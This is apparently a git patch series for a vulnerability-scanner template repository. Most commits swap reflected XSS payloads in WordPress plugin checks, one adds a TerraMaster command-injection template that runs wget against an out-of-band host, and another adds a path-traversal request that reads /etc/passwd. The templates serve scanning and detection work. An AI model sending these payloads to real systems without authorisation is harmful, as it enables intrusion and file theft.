@@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From bf0aff757989eb310e4052a2a3e608ce3fe7c870 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:32:53 +0530 Subject: [PATCH 055/149] Update CVE-2019-15713.yaml --- cves/2019/CVE-2019-15713.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml index 55c9e48f5d..311cc6e005 100644 --- a/cves/2019/CVE-2019-15713.yaml +++ b/cves/2019/CVE-2019-15713.yaml @@ -13,13 +13,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E' + - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 5b1766e10b21e08cae7393c03372a28d2c8aaf7e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:33:40 +0530 Subject: [PATCH 056/149] Update CVE-2019-16332.yaml --- cves/2019/CVE-2019-16332.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml index f067dd1e34..7a1a0b7835 100644 --- a/cves/2019/CVE-2019-16332.yaml +++ b/cves/2019/CVE-2019-16332.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 5dce5e078e2897dae1dbe7d687511afe5116d820 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:34:07 +0530 Subject: [PATCH 057/149] Update CVE-2019-16525.yaml --- cves/2019/CVE-2019-16525.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml index 3ff0907f88..c2ccc90357 100644 --- a/cves/2019/CVE-2019-16525.yaml +++ b/cves/2019/CVE-2019-16525.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%3C%2Fpath%3E' + - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From aff7f7fa64897ed7e5a3e3d86cacfcb5b061cf5a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:34:59 +0530 Subject: [PATCH 058/149] Update CVE-2019-19134.yaml --- cves/2019/CVE-2019-19134.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-19134.yaml b/cves/2019/CVE-2019-19134.yaml index 5aeed95083..89c923f6b0 100644 --- a/cves/2019/CVE-2019-19134.yaml +++ b/cves/2019/CVE-2019-19134.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E' + - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - 'foo">' + - 'foo">' part: body - type: word From c22839b3fd25435afc97d5f845226903b77652cb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:35:24 +0530 Subject: [PATCH 059/149] Update CVE-2020-12054.yaml --- cves/2020/CVE-2020-12054.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml index 11b19bcd64..2ab2fab4c9 100644 --- a/cves/2020/CVE-2020-12054.yaml +++ b/cves/2020/CVE-2020-12054.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' + - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" - "catch-breadcrumb" part: body condition: and From 75c5a8c68e0329e48fd31910f037f5fdc21667e3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:35:47 +0530 Subject: [PATCH 060/149] Update CVE-2020-17362.yaml --- cves/2020/CVE-2020-17362.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml index 0fdc277777..f448fae016 100644 --- a/cves/2020/CVE-2020-17362.yaml +++ b/cves/2020/CVE-2020-17362.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E' + - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 06a82e2c78e19a9aef718942de2963311550f4cb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:36:11 +0530 Subject: [PATCH 061/149] Update CVE-2021-24298.yaml --- cves/2021/CVE-2021-24298.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-24298.yaml b/cves/2021/CVE-2021-24298.yaml index b57d43a804..40b4fa673f 100644 --- a/cves/2021/CVE-2021-24298.yaml +++ b/cves/2021/CVE-2021-24298.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E' + - '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From c8ee50bd9b07c73be46b4425551e8d706869f15c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:36:45 +0530 Subject: [PATCH 062/149] Update CVE-2021-24320.yaml --- cves/2021/CVE-2021-24320.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-24320.yaml b/cves/2021/CVE-2021-24320.yaml index 42d961669c..27ed4e29d1 100644 --- a/cves/2021/CVE-2021-24320.yaml +++ b/cves/2021/CVE-2021-24320.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E' + - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 751f4e099c007a44bcf88350093d81645ae12988 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:37:18 +0530 Subject: [PATCH 063/149] Update CVE-2021-24335.yaml --- cves/2021/CVE-2021-24335.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-24335.yaml b/cves/2021/CVE-2021-24335.yaml index ea7b58161e..960dfbe32b 100644 --- a/cves/2021/CVE-2021-24335.yaml +++ b/cves/2021/CVE-2021-24335.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' + - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 707083438e00d915787569e0b4d9985b68144b00 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:37:51 +0530 Subject: [PATCH 064/149] Update CVE-2021-24389.yaml --- cves/2021/CVE-2021-24389.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-24389.yaml b/cves/2021/CVE-2021-24389.yaml index e8b37ed246..3b6b1bb833 100644 --- a/cves/2021/CVE-2021-24389.yaml +++ b/cves/2021/CVE-2021-24389.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E' + - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From ac66db36f3332ad6dd77c0dfe475878f0f546f9e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:38:22 +0530 Subject: [PATCH 065/149] Update wp-church-admin-xss.yaml --- vulnerabilities/wordpress/wp-church-admin-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-church-admin-xss.yaml b/vulnerabilities/wordpress/wp-church-admin-xss.yaml index 1b5fa990ab..f5c5957b97 100644 --- a/vulnerabilities/wordpress/wp-church-admin-xss.yaml +++ b/vulnerabilities/wordpress/wp-church-admin-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E" + - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 57c3f3ec20722553b2a236db2f0f20ce3103906d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:38:50 +0530 Subject: [PATCH 066/149] Update wp-custom-tables-xss.yaml --- vulnerabilities/wordpress/wp-custom-tables-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml index d29132cf89..c0918d72c5 100644 --- a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml +++ b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 705f431c1cf016cf1a9a627ca911a49f9be8598a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:39:33 +0530 Subject: [PATCH 067/149] Update wp-finder-xss.yaml --- vulnerabilities/wordpress/wp-finder-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-finder-xss.yaml b/vulnerabilities/wordpress/wp-finder-xss.yaml index c2141ac880..1bbd46235e 100644 --- a/vulnerabilities/wordpress/wp-finder-xss.yaml +++ b/vulnerabilities/wordpress/wp-finder-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From e14b31489b134d68f97935b4203b92af34104279 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:40:14 +0530 Subject: [PATCH 068/149] Update wp-flagem-xss.yaml --- vulnerabilities/wordpress/wp-flagem-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-flagem-xss.yaml b/vulnerabilities/wordpress/wp-flagem-xss.yaml index bcd78b1677..90505bc2e4 100644 --- a/vulnerabilities/wordpress/wp-flagem-xss.yaml +++ b/vulnerabilities/wordpress/wp-flagem-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 0329b1b2fb59b7f4b5ddb0c0ffe387f85a4df6b0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:40:45 +0530 Subject: [PATCH 069/149] Update wp-knews-xss.yaml --- vulnerabilities/wordpress/wp-knews-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-knews-xss.yaml b/vulnerabilities/wordpress/wp-knews-xss.yaml index 198ba8e35e..9b0815e576 100644 --- a/vulnerabilities/wordpress/wp-knews-xss.yaml +++ b/vulnerabilities/wordpress/wp-knews-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E ' + - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 4df08a33c4f81ccd7919b5d935f8b2efbb8216a7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:41:15 +0530 Subject: [PATCH 070/149] Update wp-nextgen-xss.yaml --- vulnerabilities/wordpress/wp-nextgen-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-nextgen-xss.yaml b/vulnerabilities/wordpress/wp-nextgen-xss.yaml index 30f3806e85..e4b63e62aa 100644 --- a/vulnerabilities/wordpress/wp-nextgen-xss.yaml +++ b/vulnerabilities/wordpress/wp-nextgen-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From f77f66d1e6b1fc2930ab19bf56a9158a70b3f24c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:41:40 +0530 Subject: [PATCH 071/149] Update wp-phpfreechat-xss.yaml --- vulnerabilities/wordpress/wp-phpfreechat-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml b/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml index 986f90815a..c908448c5d 100644 --- a/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml +++ b/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 5fcbd0e44642b86f7a44b3345fd46609177e60d8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:42:34 +0530 Subject: [PATCH 072/149] Update wp-slideshow-xss.yaml --- vulnerabilities/wordpress/wp-slideshow-xss.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/vulnerabilities/wordpress/wp-slideshow-xss.yaml b/vulnerabilities/wordpress/wp-slideshow-xss.yaml index 41649c222c..61a03ab44b 100644 --- a/vulnerabilities/wordpress/wp-slideshow-xss.yaml +++ b/vulnerabilities/wordpress/wp-slideshow-xss.yaml @@ -10,16 +10,16 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' +# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' +# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' +# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 574245af0ddcb266cf553914cb82390c3c10bc27 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:43:07 +0530 Subject: [PATCH 073/149] Update wp-socialfit-xss.yaml --- vulnerabilities/wordpress/wp-socialfit-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-socialfit-xss.yaml b/vulnerabilities/wordpress/wp-socialfit-xss.yaml index 50082d82a4..3da8d47f03 100644 --- a/vulnerabilities/wordpress/wp-socialfit-xss.yaml +++ b/vulnerabilities/wordpress/wp-socialfit-xss.yaml @@ -13,13 +13,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - - '' + - '' - type: word part: header words: From edabf1e7ca535c9dd542febdd93c7bbe1df59450 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 19 Jul 2021 15:13:57 +0900 Subject: [PATCH 074/149] Create CVE-2020-28188.yaml Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-28188.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2020/CVE-2020-28188.yaml diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml new file mode 100644 index 0000000000..b36fb1689b --- /dev/null +++ b/cves/2020/CVE-2020-28188.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-28188 + +info: + name: TerraMaster TOS - Unauthenticated Remote Command Execution + author: gy741 + severity: critical + description: Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter. + reference: | + - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ + - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html + - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ + tags: cve,cve2020,terramaster,rce,oob + +requests: + - raw: + - | + GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 + Host: {{Hostname}} + User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + + GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 + Host: {{Hostname}} + User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 924b9d7f5d8b1bf74ddaaf71cdad5b69ad9a0827 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 19 Jul 2021 15:36:42 +0900 Subject: [PATCH 075/149] Create terramaster-login.yaml Signed-off-by: GwanYeong Kim --- exposed-panels/terramaster-login.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/terramaster-login.yaml diff --git a/exposed-panels/terramaster-login.yaml b/exposed-panels/terramaster-login.yaml new file mode 100644 index 0000000000..a5f6a1017d --- /dev/null +++ b/exposed-panels/terramaster-login.yaml @@ -0,0 +1,26 @@ +id: terramaster-login + +info: + name: TerraMaster Login Panel + author: gy741 + severity: info + tags: panel,terramaster + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: or + matchers: + - type: word + words: + - "TOS Loading" + part: body + + - type: word + words: + - "Server: TOS" + - "X-Powered-By: TerraMaster" + condition: or + part: header From 5a5b5ea18edb8697c9b5072d325b2d8bf299c660 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 19 Jul 2021 17:16:19 +0700 Subject: [PATCH 076/149] Create CVE-2018-16059.yaml --- cves/2018/CVE-2018-16059.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2018/CVE-2018-16059.yaml diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml new file mode 100644 index 0000000000..030e0e9f95 --- /dev/null +++ b/cves/2018/CVE-2018-16059.yaml @@ -0,0 +1,26 @@ +id: CVE-2018-16059 + +info: + name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal + author: daffainfo + severity: high + reference: https://www.exploit-db.com/exploits/45342 + tags: cve,cve2018,iot,lfi + +requests: + - method: POST + path: + - "{{BaseURL}}/fcgi-bin/wgsetcgi" + body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + part: body + + - type: status + status: + - 200 From 59c091c6f66de4882bc5ff8a728a6d888311adbd Mon Sep 17 00:00:00 2001 From: jeyaseelan8 <45196752+jeyaseelan8@users.noreply.github.com> Date: Mon, 19 Jul 2021 16:31:14 +0530 Subject: [PATCH 077/149] Update dell-idrac9-default-login.yaml --- default-logins/dell/dell-idrac9-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml index 6e90d9208e..10fe93be8f 100644 --- a/default-logins/dell/dell-idrac9-default-login.yaml +++ b/default-logins/dell/dell-idrac9-default-login.yaml @@ -24,7 +24,7 @@ requests: matchers: - type: status status: - - 200 + - 201 - type: word part: body words: From 7d9dbc4aad3a97901a7c169fdc25b6e5d82002c2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 16:41:12 +0530 Subject: [PATCH 078/149] Update CVE-2020-28188.yaml --- cves/2020/CVE-2020-28188.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index b36fb1689b..acf4e53aa4 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -8,7 +8,7 @@ info: reference: | - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html - - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ + - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ tags: cve,cve2020,terramaster,rce,oob requests: From eec253fdd823de08e20f9dc252938b875c27738e Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 16:53:47 +0530 Subject: [PATCH 079/149] minor update --- cves/2021/CVE-2021-24498.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24498.yaml b/cves/2021/CVE-2021-24498.yaml index a24a3fd3cb..64eccc35f9 100644 --- a/cves/2021/CVE-2021-24498.yaml +++ b/cves/2021/CVE-2021-24498.yaml @@ -5,7 +5,7 @@ info: author: suman_kar description: The plugin does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue. severity: medium - tags: cve,cve2021,xss,wordpress + tags: cve,cve2021,xss,wordpress,wp-plugin reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86 requests: @@ -16,6 +16,7 @@ requests: Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close + matchers-condition: and matchers: - type: word @@ -25,6 +26,11 @@ requests: part: body condition: and + - type: word + words: + - 'text/html' + part: header + - type: status status: - 200 From 384fb5c0f8f2f171947309d927a34f616aa0d5c1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 11:25:34 +0000 Subject: [PATCH 080/149] Auto Update README [Mon Jul 19 11:25:34 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ff039144bf..b22a9d0c8b 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 465 | vulnerabilities | 237 | exposed-panels | 201 | +| cves | 466 | vulnerabilities | 237 | exposed-panels | 201 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**134 directories, 1603 files**. +**134 directories, 1604 files**. From a88710e503778a2246f06f7c59fa2ced7217e7a3 Mon Sep 17 00:00:00 2001 From: sandeep Date: 